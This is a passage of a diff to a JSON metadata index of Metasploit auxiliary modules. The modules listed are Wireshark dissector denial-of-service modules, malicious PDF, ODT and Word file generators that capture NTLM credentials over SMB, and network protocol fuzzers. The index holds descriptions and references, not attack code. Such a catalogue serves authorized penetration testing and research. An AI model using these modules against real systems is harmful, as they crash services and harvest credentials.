+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/wireshark/chunked.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/chunked",
@@ -18604,26 +18396,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/wireshark/cldap": {
"name": "Wireshark CLDAP Dissector DOS",
"fullname": "auxiliary/dos/wireshark/cldap",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-03-01",
"type": "auxiliary",
"author": [
"joernchen (Phenoelit)>"
],
- "description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially crafted UDP packet.",
+ "description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially crafted UDP packet.",
"references": [
"CVE-2011-1140",
"OSVDB-71552",
@@ -18633,14 +18426,10 @@
"platform": "",
"arch": "",
"rport": 389,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/wireshark/cldap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/cldap",
@@ -18648,26 +18437,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/wireshark/ldap": {
"name": "Wireshark LDAP Dissector DOS",
"fullname": "auxiliary/dos/wireshark/ldap",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-03-28",
"type": "auxiliary",
"author": [
"MC "
],
- "description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.",
+ "description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.",
"references": [
"CVE-2008-1562",
"OSVDB-43840"
@@ -18675,14 +18465,10 @@
"platform": "",
"arch": "",
"rport": 389,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/wireshark/ldap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/ldap",
@@ -18690,19 +18476,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fileformat/badpdf": {
"name": "BADPDF Malicious PDF Creator",
"fullname": "auxiliary/fileformat/badpdf",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18720,14 +18507,10 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/auxiliary/fileformat/badpdf.rb",
"is_install_path": true,
"ref_name": "fileformat/badpdf",
@@ -18735,44 +18518,91 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
+ },
+ "auxiliary_fileformat/maldoc_in_pdf_polyglot": {
+ "name": "Maldoc in PDF Polyglot converter",
+ "fullname": "auxiliary/fileformat/maldoc_in_pdf_polyglot",
+ "aliases": [],
+ "rank": 300,
+ "disclosure_date": null,
+ "type": "auxiliary",
+ "author": [
+ "mekhalleh (RAMELLA Sebastien)"
+ ],
+ "description": "A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file\n structure of PDF.\n\n If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.\n\n The attack does not bypass configured macro locks. And the malicious macros are also not executed when the\n file is opened in PDF readers or similar software.",
+ "references": [
+ "URL-https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html",
+ "URL-https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/",
+ "URL-https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/",
+ "URL-https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo"
+ ],
+ "platform": "Windows",
+ "arch": "",
+ "rport": null,
+ "autofilter_ports": [],
+ "autofilter_services": [],
+ "targets": null,
+ "mod_time": "2025-06-04 12:33:22 +0000",
+ "path": "/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb",
+ "is_install_path": true,
+ "ref_name": "fileformat/maldoc_in_pdf_polyglot",
+ "check": false,
+ "post_auth": false,
+ "default_credential": false,
+ "notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "Reliability": [],
+ "SideEffects": [
+ "artifacts-on-disk"
+ ]
+ },
+ "session_types": false,
+ "needs_cleanup": false,
+ "actions": []
},
"auxiliary_fileformat/multidrop": {
"name": "Windows SMB Multi Dropper",
"fullname": "auxiliary/fileformat/multidrop",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Richard Davy - secureyourit.co.uk",
- "Lnk Creation Code by Mubix",
- "asoto-r7"
+ "mubix ",
+ "asoto-r7",
+ "hyp3rlinx",
+ "bcoles "
],
- "description": "This module dependent on the given filename extension creates either\n a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference\n to the specified remote host, causing SMB connections to be initiated\n from any user that views the file.",
+ "description": "This module dependent on the given filename extension creates either\n a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes\n a reference to the specified remote host, causing SMB connections to be\n initiated from any user that views the file.",
"references": [
"URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018",
"URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/",
- "URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/"
+ "URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/",
+ "URL-https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-12-04 17:41:24 +0000",
+ "mod_time": "2025-05-02 01:28:52 +0000",
"path": "/modules/auxiliary/fileformat/multidrop.rb",
"is_install_path": true,
"ref_name": "fileformat/multidrop",
@@ -18780,19 +18610,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fileformat/odt_badodt": {
"name": "LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator",
"fullname": "auxiliary/fileformat/odt_badodt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-05-01",
"type": "auxiliary",
@@ -18807,34 +18638,65 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2018-06-06 11:26:20 +0000",
+ "mod_time": "2025-06-20 13:20:44 +0000",
"path": "/modules/auxiliary/fileformat/odt_badodt.rb",
"is_install_path": true,
"ref_name": "fileformat/odt_badodt",
"check": false,
"post_auth": false,
"default_credential": false,
+ "notes": {},
+ "session_types": false,
+ "needs_cleanup": false,
+ "actions": []
+ },
+ "auxiliary_fileformat/word_unc_injector": {
+ "name": "Microsoft Word UNC Path Injector",
+ "fullname": "auxiliary/fileformat/word_unc_injector",
+ "aliases": [
+ "auxiliary/docx/word_unc_injector"
+ ],
+ "rank": 300,
+ "disclosure_date": null,
+ "type": "auxiliary",
+ "author": [
+ "SphaZ "
+ ],
+ "description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.",
+ "references": [
+ "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534"
+ ],
+ "platform": "",
+ "arch": "",
+ "rport": null,
+ "autofilter_ports": [],
+ "autofilter_services": [],
+ "targets": null,
+ "mod_time": "2025-04-30 18:26:15 +0000",
+ "path": "/modules/auxiliary/fileformat/word_unc_injector.rb",
+ "is_install_path": true,
+ "ref_name": "fileformat/word_unc_injector",
+ "check": false,
+ "post_auth": false,
+ "default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/dns/dns_fuzzer": {
"name": "DNS and DNSSEC Fuzzer",
"fullname": "auxiliary/fuzzers/dns/dns_fuzzer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18842,20 +18704,14 @@
"pello "
],
"description": "This module will connect to a DNS server and perform DNS and\n DNSSEC protocol-level fuzzing. Note that this module may inadvertently\n crash the target server.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 53,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2019-12-07 08:01:52 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/dns/dns_fuzzer",
@@ -18863,19 +18719,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/ftp/client_ftp": {
"name": "Simple FTP Client Fuzzer",
"fullname": "auxiliary/fuzzers/ftp/client_ftp",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18889,14 +18746,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb",
"is_install_path": true,
"ref_name": "fuzzers/ftp/client_ftp",
@@ -18904,19 +18757,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/ftp/ftp_pre_post": {
"name": "Simple FTP Fuzzer",
"fullname": "auxiliary/fuzzers/ftp/ftp_pre_post",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18925,20 +18779,14 @@
"jduck "
],
"description": "This module will connect to a FTP server and perform pre- and post-authentication fuzzing",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 21,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2019-03-05 03:38:51 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
"is_install_path": true,
"ref_name": "fuzzers/ftp/ftp_pre_post",
@@ -18946,19 +18794,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/http/http_form_field": {
"name": "HTTP Form Field Fuzzer",
"fullname": "auxiliary/fuzzers/http/http_form_field",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18966,7 +18815,7 @@
"corelanc0d3r",
"Paulino Calderon "
],
- "description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)",
+ "description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)",
"references": [
"URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer"
],
@@ -18989,7 +18838,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_form_field.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_form_field",
@@ -18997,19 +18846,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/http/http_get_uri_long": {
"name": "HTTP GET Request URI Fuzzer (Incrementing Lengths)",
"fullname": "auxiliary/fuzzers/http/http_get_uri_long",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19017,20 +18867,14 @@
"nullthreat"
],
"description": "This module sends a series of HTTP GET request with incrementing URL lengths.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_get_uri_long",
@@ -19038,19 +18882,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/http/http_get_uri_strings": {
"name": "HTTP GET Request URI Fuzzer (Fuzzer Strings)",
"fullname": "auxiliary/fuzzers/http/http_get_uri_strings",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19058,20 +18903,14 @@
"nullthreat"
],
"description": "This module sends a series of HTTP GET request with malicious URIs.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_get_uri_strings",
@@ -19079,19 +18918,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/ntp/ntp_protocol_fuzzer": {
"name": "NTP Protocol Fuzzer",
"fullname": "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19099,20 +18939,14 @@
"Jon Hart "
],
"description": "A simplistic fuzzer for the Network Time Protocol that sends the\n following probes to understand NTP and look for anomalous NTP behavior:\n\n * All possible combinations of NTP versions and modes, even if not\n allowed or specified in the RFCs\n * Short versions of the above\n * Short, invalid datagrams\n * Full-size, random datagrams\n * All possible NTP control messages\n * All possible NTP private messages\n\n This findings of this fuzzer are not necessarily indicative of bugs,\n let alone vulnerabilities, rather they point out interesting things\n that might deserve more attention. Furthermore, this module is not\n particularly intelligent and there are many more areas of NTP that\n could be explored, including:\n\n * Warn if the response is 100% identical to the request\n * Warn if the \"mode\" (if applicable) doesn't align with what we expect,\n * Filter out the 12-byte mode 6 unsupported opcode errors.\n * Fuzz the control message payload offset/size/etc. There be bugs",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 123,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2021-04-06 14:45:11 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/ntp/ntp_protocol_fuzzer",
@@ -19120,40 +18954,35 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smb/smb2_negotiate_corrupt": {
"name": "SMB Negotiate SMB2 Dialect Corruption",
"fullname": "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module sends a series of SMB negotiate requests that advertise a\n SMB2 dialect with corrupted bytes.",
- "references": [
-
- ],
+ "description": "This module sends a series of SMB negotiate requests that advertise a\n SMB2 dialect with corrupted bytes.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-08-24 21:38:44 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb2_negotiate_corrupt",
@@ -19161,29 +18990,28 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smb/smb_create_pipe": {
"name": "SMB Create Pipe Request Fuzzer",
"fullname": "auxiliary/fuzzers/smb/smb_create_pipe",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module sends a series of SMB create pipe\n requests using malicious strings.",
- "references": [
-
- ],
+ "description": "This module sends a series of SMB create pipe\n requests using malicious strings.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -19196,7 +19024,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_create_pipe",
@@ -19204,19 +19032,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smb/smb_create_pipe_corrupt": {
"name": "SMB Create Pipe Request Corruption",
"fullname": "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19224,9 +19053,7 @@
"hdm "
],
"description": "This module sends a series of SMB create pipe requests with corrupted bytes.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -19239,7 +19066,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_create_pipe_corrupt",
@@ -19247,19 +19074,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smb/smb_negotiate_corrupt": {
"name": "SMB Negotiate Dialect Corruption",
"fullname": "auxiliary/fuzzers/smb/smb_negotiate_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19267,20 +19095,14 @@
"hdm "
],
"description": "This module sends a series of SMB negotiate requests with corrupted bytes",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-08-24 21:38:44 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_negotiate_corrupt",
@@ -19288,29 +19110,28 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smb/smb_ntlm1_login_corrupt": {
"name": "SMB NTLMv1 Login Request Corruption",
"fullname": "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.",
- "references": [
-
- ],
+ "description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -19323,7 +19144,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-07 20:22:56 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt",
@@ -19331,29 +19152,28 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smb/smb_tree_connect": {
"name": "SMB Tree Connect Request Fuzzer",
"fullname": "auxiliary/fuzzers/smb/smb_tree_connect",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module sends a series of SMB tree connect\n requests using malicious strings.",
- "references": [
-
- ],
+ "description": "This module sends a series of SMB tree connect\n requests using malicious strings.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -19366,7 +19186,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_tree_connect",
@@ -19374,19 +19194,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smb/smb_tree_connect_corrupt": {
"name": "SMB Tree Connect Request Corruption",
"fullname": "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19394,9 +19215,7 @@
"hdm "
],
"description": "This module sends a series of SMB tree connect requests with corrupted bytes.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -19409,7 +19228,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_tree_connect_corrupt",
@@ -19417,19 +19236,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/smtp/smtp_fuzzer": {
"name": "SMTP Simple Fuzzer",
"fullname": "auxiliary/fuzzers/smtp/smtp_fuzzer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19456,7 +19276,7 @@
"smtps"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/smtp/smtp_fuzzer",
@@ -19464,19 +19284,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/ssh/ssh_kexinit_corrupt": {
"name": "SSH Key Exchange Init Corruption",
"fullname": "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19484,20 +19305,14 @@
"hdm "
],
"description": "This module sends a series of SSH requests with a corrupted initial key exchange payload.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_kexinit_corrupt",
@@ -19505,19 +19320,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/ssh/ssh_version_15": {
"name": "SSH 1.5 Version Fuzzer",
"fullname": "auxiliary/fuzzers/ssh/ssh_version_15",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19525,20 +19341,14 @@
"hdm "
],
"description": "This module sends a series of SSH requests with malicious version strings.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_15",
@@ -19546,19 +19356,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/ssh/ssh_version_2": {
"name": "SSH 2.0 Version Fuzzer",
"fullname": "auxiliary/fuzzers/ssh/ssh_version_2",
- "aliases": [
-
